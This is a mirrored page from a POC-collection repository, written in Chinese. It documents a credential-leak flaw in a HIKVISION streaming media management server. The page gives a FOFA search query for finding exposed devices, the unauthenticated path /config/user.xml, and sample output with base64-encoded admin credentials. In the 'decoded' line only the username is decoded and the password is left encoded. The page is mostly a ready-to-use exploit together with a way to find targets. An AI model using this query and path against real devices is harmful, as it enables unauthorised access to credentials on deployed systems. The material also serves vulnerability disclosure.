admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

43 lines
671 B
Markdown
Raw Blame History

# HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞
## 漏洞描述
HIKVISION 流媒体管理服务器配置文件未做鉴权,攻击者通过漏洞可以获取网站账号密码
## 漏洞影响
```
HIKVISION 流媒体管理服务器
```
## FOFA
```
"杭州海康威视系统技术有限公司 版权所有" && title="流媒体管理服务器"
```
## 漏洞复现
登陆页面
![image-20220519172629739](./images/202205191726829.png)
POC
```
/config/user.xml
```
![image-20220519172714407](./images/202205191727443.png)
```
<user name="YWRtaW4=" password="MTIzNDU="/>
```
base64解密
```
<user name="admin" password="MTIzNDU="/>
```
Reference in New Issue View Git Blame Copy Permalink